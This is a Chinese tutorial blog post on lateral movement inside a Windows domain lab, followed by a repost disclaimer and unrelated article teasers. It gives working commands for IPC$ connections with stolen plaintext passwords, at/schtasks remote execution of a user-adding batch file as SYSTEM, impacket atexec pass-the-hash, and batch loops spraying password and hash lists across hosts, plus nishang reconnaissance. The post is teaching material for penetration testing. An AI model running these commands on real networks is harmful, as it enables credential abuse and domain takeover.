66 内网安全-域横向批量atschtasksimpacket

目录

    • 演示案例:
      • 横向渗透明文传递at&schtasks
    • 案例2-横向渗透明文HASH传递atexec-impacket
    • 案例3-横向渗透明文HASH传递批量利用-综合
    • 案例5-探针主机域控架构服务操作演示

在这里插入图片描述
传递攻击是建立在明文和hash值的一个获取基础上的攻击,也是在内网里面常见协议的攻击,这篇文章主要讲at
在这里插入图片描述
我们现在讲的话是围绕webserver被入侵,他有一个相当外网接口,进去之后,通过webserver来实现渗透其它的主机加上这个域控

演示案例:

横向渗透明文传递at&schtasks

在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
获取到某域主机权限->mnikatz得到密码(明文,hash) ->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令
可以联合msf后门和cs2后门进行联动
利用流程
1.建立IPC链接到目标主机
2.拷贝要执行的命令脚本到目标主机
3.查看目标时间,创建计划任务 (at、schtasks)定时执行拷贝到的脚本
4.删除IPC链接

net use \\server\ipc$"password" /user:username     # 工作组
net use \\server\ipc$"password" /user:domain\username   #域内
dir \\xx.XX.XX.XX\C$\            #查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat         #下载文件
copy 1.bat \\xx.xx.xx.xx\C$             #复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del   # 删除IPC
net view xx.xx.xx.xx                         #查看对方共享
#建立IPC常见的错误代码

(1) 5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2) 51: 网络问题,windows 无法找到网络路径
(3)53: 找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
(4) 67: 找不到网络名,本地Lanmanworkstation服务未启动,目标删ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
(6)1326: 账号密码错误
(7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况
(8)2242: 用户密码过期,目标有账号策略,强制定期更改密码
#建立IPC失败的原因

(1)目标系统不是NT或以上的操作系统,操作系统在2003以上才可以,低版本就没有
(2)对方没有打开IPC$共享
(3)对方未开启139、445端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误

[at] & [schtasks]
#at < Windows2012
net use \192.168.3.21\ipc$ “Admin12345” /user:god.org\administrator # 建立ipc连接:
copy add.bat \192.168.3.21\c$ #拷贝执行文件到目标机器
at \192.168.3.21 15:47 c:\add.bat #添加计划任务
在域控里面linux服务器是很少见的,他是可以加入域控,但是一般很少见,如果碰上的话,要结合linux上的操作系统进行攻击

#schtasks >=Windows2012
net use \192.168.3.32\ipc$ “admin!@#45” /user:god.org\administrator # 建立ipc连接:
copy add.bat \192.168.3.32\c$ #复制文件到其C盘
schtasks /create /s 192.168.3.32 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser任务对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行adduser任务
schtasks /delete /s 192.168.3.21 /tn adduser /f #删除adduser任务

案例2-横向渗透明文HASH传递atexec-impacket

atexec.exe ./administrator:Admin12345@192.168.3.21 “whoami”
atexec.exe god/administrator:Admin12345@192.168.3.21 “whoami”
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”

案例3-横向渗透明文HASH传递批量利用-综合

FOR /F %%i in (ips.txt) do net use \%%i\ipc$ “admin!@#45” /user:administrator #批量检测IP对应明文连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami
#批最检测IP对应明文回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%i@192.168.3.21 whoami
#批量检测明文对应IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i./administrator@192.168.3.21 whoami #批量检测HASH对应IP回显版

py有第三方库,可以把写的脚本打包成exe,而且在免杀这个专题里面,用python做免杀也是很多的,用c语言写也可以,易语言写的简单方便,用易语言写的程序很多都容易被干掉,他有那个误报,用C语言写会比较好,用C语言写大家都不懂,因为大家都没有学过C++这门语言,这个时候py的优点就突出来了,我们就不用考虑脚本,对方装没装这个py脚本,常规来讲,我们都是在写py文件,用py来运行他,但是py也支持打包成exe,自己装个库就完事了

案例5-探针主机域控架构服务操作演示

为后续横向思路做准备,针对应用,协议等各类攻击手法
探针域控制器名及地址信息
net time /domain nslookup ping
探针域内存活主机及地址信息
nbtscan 192.168.3.0/24 第三方工具
for /L %I in (1,1,254) Do @ping -w 1 -n 1 192.168.3.%I findstr “TTI=” 自带内部命令
nmap masscan 第三方Powershell脚本nishang empire等
#导入模块nishang
Import-Module .\nishang.psml
#设置执行策略
Set-ExecutionPolicy RemoteSigned
#获取模块nishang的命令函数
Get-Commmand -Module nishang
#获取常规计算机信息
Get-Information
#端口扫描 (查看目录对应文件有演示语法,其他同理)
Invoke-PortScan -startAddress 192.168.3.0 -EndAddress192.168.3.100 -ResolveHost -ScanPort
#其他功能: 删除补丁,反弹Shell,凭据获取等
探针域内主机角色及服务信息
利用开放端口服务及计算机名判断
都是基于定时任务,计划任务实现的攻击,有些环境不支持py,可能得用exe

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/124822.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python pandas提取正无穷inf与负无穷-inf所在数据行/列

dataframe.replace([np.inf, -np.inf], np.nan,inplaceTrue) # 替换值然后再删除所在行&#xff1a; dataframe.dropna(inplaceTrue)或是删除所在列&#xff1a; dataframe.dropna(axis1,inplaceTrue)示例程序 import numpy as np import pandas as pddataframe.replace([np…

Linux环境下安装ES

更多ElasticSearch教程&#xff1a;点击查看 1. 先新建一个用户&#xff08;出于安全考虑&#xff0c;Elasticsearch默认不允许以root账号运行。&#xff09; 创建用户&#xff1a; useradd esuser 设置密码&#xff1a; passwd esuser2. 下载ES安装包并解压到es目录 修改ES…

一道简单的C#面试题

试题&#xff1a; 抽顺序问题&#xff1a;有10位面试者&#xff0c;需要随机抽号面试。 1&#xff09;总共十个号数&#xff0c;用数组表示&#xff1b; 2&#xff09;每一位面试者输入1开始抽签&#xff0c;然后得到抽签号&#xff0c;输入2结束抽签&#xff1b; 3&#x…

深度学习02-数据集格式转换

背景&#xff1a; 通常搜集完数据图片后&#xff0c;我们会用labelimg进行图片标注&#xff0c;比较高版本的labelimg支持的标注格式有三种&#xff0c;PascalVOC、YOLO、CreateML&#xff0c;标注的时候可以根据自己的算法模型数据集需求选择相应的格式&#xff0c;当然&…

Linux玩物志:好玩却无用的软件探秘

W...Y的主页 &#x1f60a; 代码仓库分享&#x1f495; &#x1f354;前言&#xff1a; 我们已经学习了yum指令&#xff0c;可以在Linux中安装一些软件的指令。下面我们就盘点一些可玩性很高但是却没有什么用的软件&#xff0c;在枯燥的学习中增添一丝乐趣&#xff01; For…

CSS宽度100%和宽度100vw之间有什么不同?

vw和vh分别代表视口宽度和视口高度。 使用width: 100vw代替的区别在于width: 100%&#xff0c;虽然100%将使元素适合所有可用空间&#xff0c;但视口宽度具有特定的度量&#xff0c;在这种情况下&#xff0c;可用屏幕的宽度 。 如果设置样式body { margin: 0 }&#xff0c;则1…

2000-2021年上市公司产融结合度量数据

2000-2021年上市公司产融结合度量数据 1、时间&#xff1a;2000-2021年 2、指标&#xff1a;股票代码、年份、是否持有银行股份、持有银行股份比例、是否持有其他金融机构股份、产融结合 3、来源&#xff1a;上市公司年报 4、范围&#xff1a;上市公司 5、样本量&#xff…

gRPC源码剖析-Builder模式

一、Builder模式 1、定义 将一个复杂对象的构建与表示分离&#xff0c;使得同样的构建过程可以创建不同的的表示。 2、适用场景 当创建复杂对象的算法应独立于该对象的组成部分以及它们的装配方式时。 当构造过程必须允许被构造的对象有不同的表示时。 说人话&#xff1a…

java基础篇-环境变量

java基础 编程学习的关键点、重点1.环境变量设置待续 编程学习的关键点、重点 输入输出 Java语言、C语言、Python语言、甚至SQL语言&#xff0c;都需要实战、做大量输入输出等 1.环境变量设置 1.下载jdk安装 jdk官网下载直达链接&#xff1a;https://www.oracle.com/java/te…

Word插入Latex语句并编译为数学公式

WPS不可行&#xff0c;正版word可以&#xff08;垃圾WPS&#xff09; 选中Latex语句并按下Alt &#xff08;此处以后补一张图&#xff09; 该方法不需要额外安装什么插件哦&#xff01;

system verilog VSCode Windows 配置简述

system verilog VSCode Windows 配置简述 本文章的目的并非完全在 VSCode 中进行 system verilog 编程&#xff0c;而是以 vivado 为核心&#xff0c;将 VSCode 作为编译器。 配置步骤 安装 ctags choco install universal-ctags如果你没有安装 chocolatey&#xff0c;见 i…

[Unity] 个人编码规范与命名准则参考

Unity C# 在写的过程中, 和纯 C# 是有很大出入的. 甚至说, Unity C# 就是邪教. 例如它的命名规范与 C# 是不一致的, 而且由于游戏引擎的介入, 编写时的习惯相较于 C# 来讲, 也需要有所改变. 通用编码规范 常见的一些编码规范就不需要过多提及了, 这里只做简单列举. 添加合适…

2023香港秋灯展丨移远通信闪耀亮相,开启Matter生态互联新篇章

10月27日&#xff0c;2023香港国际秋季灯饰展于香港会议展览中心正式开幕。 移远通信携最新一站式Matter解决方案、Wi-Fi模组&#xff0c;以及多款代表前沿技术的智能灯具、插座等终端重磅亮相。同时&#xff0c;公司产品总监丁子文围绕“Matter生态互联新篇章”主题发表演讲&a…

深度学习之基于YoloV8的行人跌倒目标检测系统

欢迎大家点赞、收藏、关注、评论啦 &#xff0c;由于篇幅有限&#xff0c;只展示了部分核心代码。 文章目录 一项目简介 二、功能三、行人跌倒目标检测系统四. 总结 一项目简介 世界老龄化趋势日益严重&#xff0c;现代化的生活习惯又使得大多数老人独居&#xff0c;统计数据表…

Zynq UltraScale+ XCZU7EV 纯VHDL解码 IMX214 MIPI 视频,2路视频拼接输出,提供vivado工程源码和技术支持

目录 1、前言免责声明 2、我这里已有的 MIPI 编解码方案3、本 MIPI CSI2 模块性能及其优越性4、详细设计方案设计原理框图IMX214 摄像头及其配置D-PHY 模块CSI-2-RX 模块Bayer转RGB模块伽马矫正模块VDMA图像缓存Video Scaler 图像缓存DP 输出 5、vivado工程详解PL端FPGA硬件设计…

Ansible 的脚本-playbook 剧本

这里写目录标题 Ansible 的脚本-playbook 剧本一.playbooks的组成1.playbooks 本身由以下各部分组成2.示例3.定义、引用变量4.指定远程主机sudo切换用户5.when条件判断6.迭代 二.playbook剧本模块1.Templates 模块2.tags 模块3.Roles 模块 Ansible 的脚本-playbook 剧本 一.pl…

SurfaceFliger绘制流程

前景提要&#xff1a; 当HWComposer接收到Vsync信号时&#xff0c;唤醒DisSync线程&#xff0c;在其中唤醒EventThread线程&#xff0c;调用DisplayEventReceiver的sendObjects像BitTub发送消息&#xff0c;由于在SurfaceFlinger的init过程中创建了EventThread线程&#xff0c…

MySQL负载均衡技术及实现方案

一、引言 随着互联网业务的快速发展&#xff0c;数据库作为核心的基础设施之一&#xff0c;其性能和稳定性对于整个应用系统至关重要。MySQL作为一种广泛使用的开源关系型数据库管理系统&#xff0c;面临着如何在高并发、大规模数据场景下保证性能和稳定性的问题。为了解决这个…

Android环境变量macOS环境变量配置

关于作者&#xff1a;CSDN内容合伙人、技术专家&#xff0c; 从零开始做日活千万级APP。 专注于分享各领域原创系列文章 &#xff0c;擅长java后端、移动开发、商业变现、人工智能等&#xff0c;希望大家多多支持。 目录 一、导读二、概览macOS基础知识 三、设置环境变量3.1 终…

Spring两大核心之一:AOP(面向切面编程)含设计模式讲解,通知类型切点;附有案例,实现spring事务管理

模拟转账业务 pom.xml <dependencies><!--spring--><dependency><groupId>org.springframework</groupId><artifactId>spring-context</artifactId><version>5.3.29</version></dependency><!--lombok-->…